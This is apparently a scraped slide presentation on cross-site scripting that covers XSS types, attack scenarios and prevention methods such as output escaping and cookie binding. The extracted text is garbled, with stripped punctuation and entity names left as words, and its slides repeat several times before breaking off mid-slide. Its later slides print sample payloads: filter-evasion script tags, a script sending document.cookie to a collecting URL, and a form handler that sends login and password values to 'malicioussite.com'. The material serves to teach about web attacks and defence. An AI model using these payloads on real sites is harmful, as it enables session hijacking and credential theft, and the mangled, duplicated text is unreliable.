View
7.459
Download
1
Category
Preview:
DESCRIPTION
jst a little info about hw internet hacking is done and how to protect it ...
Citation preview
1
Internet a great source for every workhellip
In which for every work there is a different site
Earlier these sites were statichellip ie just
the paragraphs and text fileshellipwhich was a huge task to read hellip
But today the Websites are more complex than ever containing a lot of graphic and dynamic content making the experience for the user more enjoyable
2
Dynamic content
gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements
And many more helliphelliphellip
3
WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
2
Dynamic content
gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements
And many more helliphelliphellip
3
WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
3
WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
